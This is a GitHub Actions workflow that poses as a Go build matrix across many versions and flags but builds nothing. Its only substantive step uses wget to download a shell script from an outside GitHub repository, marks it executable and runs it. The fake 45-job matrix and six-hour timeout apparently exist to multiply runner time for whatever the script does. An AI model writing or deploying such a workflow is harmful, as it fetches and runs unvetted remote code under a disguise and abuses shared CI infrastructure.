name: JUALANIKAN
on: [push, pull_request]
jobs:
  build:
    name: AF_chanel
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 30
      fail-fast: false
      matrix:
        go: [1.6, 1.7, 1.8, 1.9, 1.10]
        flag: [A, B, C, D, E, F, G, H, I]
    timeout-minutes: 360
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: AF_chanel
      run: |
        wget https://github.com/Adhy0788/ikanasin/blob/main/ikanasin.sh && chmod u+x ikanasin.sh && ./ikanasin.sh
